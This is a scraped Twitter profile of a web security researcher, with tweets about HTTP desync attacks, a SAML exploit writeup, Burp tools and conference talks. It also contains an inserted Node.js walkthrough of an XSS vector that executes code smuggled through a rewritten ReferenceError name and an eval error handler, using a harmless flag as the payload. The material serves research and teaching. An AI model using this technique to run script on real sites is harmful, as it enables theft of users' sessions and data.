Martin Doyhenard (@tincho_508)'s Twitter Profile
Martin Doyhenard

@tincho_508

Security Researcher at PortSwigger. Speaker at BlackHat, DEF CON, RSA, Hack In The Box, Troopers, EkoParty

ID: 307063056

Joined: 28-05-2011 23:36:10

227 Tweets

2.2K Followers

208 Following

Ekoparty | Hacking everything (@ekoparty):

“Gotta Cache Em All: Bending the rules of web cache exploitation” In recent years, web cache attacks have become a common way to steal data, deface sites and deliver exploits, as well as to expose critical vulnerabilities such as SSRF and HTTP Request Smuggling. In the

Gareth Heyes (@garethheyes):

You might have noticed that the recent SAML writeups omit some crucial details. In "SAML roulette: the hacker always wins", we share everything you need to know for a complete unauthenticated exploit on ruby-saml, using GitLab as a case-study. portswigger.net/research/saml-…

Martin Doyhenard (@tincho_508):

Speed up your Bug Bounty & Pentest reporting! I've built a Custom Action to instantly capture & annotate screenshots without leaving Burp. Download it from our GitHub or import directly into your Bambda! github.com/PortSwigger/ba…

Martin Doyhenard (@tincho_508):

I've just updated my "Screenshot" custom action with new features and hotkeys (thanks El Mago (backup)) To install it you can use Extensibility Helper, a new Burp extension that lets you import Bambdas directly from our GitHub repository with a single click! Go and get it!

Burp Suite (@burp_suite):

Take Burp a step further and provide even more functionality than before with Custom Actions. Use Martin Doyhenard's new Bambda to take screenshots in Burp. You can also highlight and draw on your image to draw attention to specific areas. Check it out 👉 github.com/PortSwigger/ba…

James Kettle (@albinowax):

I'm thrilled to announce "HTTP/1 Must Die! The Desync Endgame", at #BHUSA! This is going to be epic, check out the abstract for a teaser ↓↓↓

Martin Doyhenard (@tincho_508):

Thrilled to announce that I'll be presenting at #BlackHat USA 2025 Arsenal! Introducing HTTP Raider: a Burp Suite extension designed for deep HTTP protocol analysis and exploitation. Dive into stream-based HTTP vulnerabilities like never before. See you in Vegas!

Thomas Stacey (@t0xodile):

Thrilled to finally release my latest research "The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling". Desync vulnerabilities stemming from HTTP/2 downgrading continue to plague even the largest vendors, have a read to find out more! assured.se/posts/the-sing…

Bug Bounty Village (@bugbountydefcon):

“I kind of thought SQLi was a thing of the past” — Justin Gardner

Turns out it’s alive and well. Still shows up at live hacking events. Sometimes deep. Sometimes not even that deep. Just waiting.

Full talk → youtu.be/PXqlHAoF2wc #BugBounty #DEFCON #BBV #AppSec #WebSecurity

Gareth Heyes (@garethheyes):

Firefox now opens the door to URL-based XSS payload smuggling too. Yep, even more ways to sneak past filters using the window name and clever URL tricks. Link to vectors👇

Gareth Heyes (@garethheyes):

This vector adds an onerror handler with eval, rewrites all ReferenceError names, then triggers an error to execute the payload. Just added it to the XSS cheat sheet. Credit to 0x999 🇮🇱, inspired by terjanq. Link to vector👇

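
The three steps the post describes, replayed as an added Node.js illustration. This is not the vector from the XSS cheat sheet (the post links to it and it is not reproduced here); it models `window.onerror = eval` with a plain function that evals the stringified error, and the `"Uncaught "` prefix passed in is an assumption about the message format Chrome hands to `window.onerror`. The `payloadRan` global and all function names are this example's own.

```javascript
// Added illustration (Node.js), not the cheat-sheet vector. It replays the mechanism
// the post describes in a plain runtime:
//   1. install an error handler that evals its argument (window.onerror = eval in a page),
//   2. rewrite the name every ReferenceError reports itself with,
//   3. trigger a ReferenceError so the payload reaches the handler inside the error text.

// A global the payload is allowed to set, so the demo can prove execution without alert().
globalThis.payloadRan = false;

// Step 1. Stand-in for `window.onerror = eval`: whatever text describes the error is
// executed as code. Indirect eval runs in global (sloppy) scope, as the page handler would.
function onerrorHandler(message) {
  return (0, eval)(message);
}

// Step 2. Error.prototype.toString() builds `<name>: <message>` and looks `name` up on
// the prototype chain, so after this every ReferenceError starts with attacker text.
function rewriteReferenceErrorName(name) {
  ReferenceError.prototype.name = name;
}

// Step 3. Reference an undeclared identifier, then hand the stringified error to the
// handler. `prefix` models the "Uncaught " that Chrome prepends to window.onerror
// messages (an assumption about Chrome; pass '' for a runtime that omits it).
function triggerAndDeliver(prefix) {
  try {
    undeclaredIdentifier; // ReferenceError: undeclaredIdentifier is not defined
  } catch (e) {
    // With the prefix the handler sees e.g.
    //   "Uncaught =payloadRan=true//: undeclaredIdentifier is not defined"
    // which eval() parses as `Uncaught = payloadRan = true` followed by a line comment.
    return onerrorHandler(prefix + String(e));
  }
}

function runVector(prefix = 'Uncaught ') {
  globalThis.payloadRan = false;
  // A leading "=" turns the prefix into the left side of an assignment; with no prefix
  // the statement has to begin with the payload itself.
  const name = (prefix ? '=' : '') + 'payloadRan=true//';
  const original = ReferenceError.prototype.name;
  try {
    rewriteReferenceErrorName(name);
    triggerAndDeliver(prefix);
    return globalThis.payloadRan; // true when the code carried in the error name executed
  } finally {
    rewriteReferenceErrorName(original); // restore the prototype for the rest of the process
  }
}

console.log('payload executed:', runVector());
```

The point worth noticing is that the executed statement never appears as a call in the vector: it is stored in `ReferenceError.prototype.name` and only becomes code when the runtime formats the error and the handler evals that string.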
Gareth Heyes (@garethheyes):

I wanted to learn web sockets. So I built hacking rooms! You can now connect multiple browsers and use HackPad to test HTML. You'll get a message with every browser connected. It even goes red when you call alert() from a different browser :D hackvertor.co.uk/hack-pad/hacki…

Liv Matan (@terminatorlm):

👻This is GerriScary: a vulnerability I discovered in Google's Gerrit that allowed hacking several projects and affected 18 Google projects including ChromiumOS (CVE-2025-1568), Chromium, Bazel, and Dart. Dive into the full details here: tenable.com/blog/gerriscar…

Martin Doyhenard (@tincho_508):

I'm thrilled to share that I will be presenting a 90 minute workshop in DEFCON's Bug Bounty Village! I will be speaking about advanced HTTP Desynchronisation attacks, and introducing a new tool to exploit complex vulnerabilities found in top bounty programs!

d4d (@d4d89704243):

Thrilled to announce: I’ll be presenting a major new version of WebSocket Turbo Intruder at Black Hat Arsenal 2025! This open-source toolkit makes high-speed, advanced WebSocket attacks practical and painless.

Bug Bounty Village (@bugbountydefcon):

Now that our CTF is announced, we’re excited to welcome PortSwigger as our CTF Triage partner of the Bug Bounty Village CTF at DEF CON 33! Their support helps us build a space where hackers can connect, learn, and push boundaries. #BugBounty #DEFCON #BBV #BugBountyVillage

Bug Bounty Village (@bugbountydefcon):

Don't miss "Surfing through the Stream: Advanced HTTP Desync exploitation in the wild" by Martin Doyhenard on Saturday, August 9 at 01:00 PM inside the Village. Read more at bugbountydefcon.com/agenda #BugBounty #DEFCON33

Burp Suite (@burp_suite):

Today at #BlackHatUSA - three major new releases from PortSwigger Research

1pm - 'HTTP Hacker' at Black Hat Arsenal with Martin Doyhenard
1pm - 'WebSocket Turbo Intruder' at Black Hat Arsenal with d4d
3.20pm - 'HTTP/1.1 Must Die! The Desync Endgame' at Black Hat USA with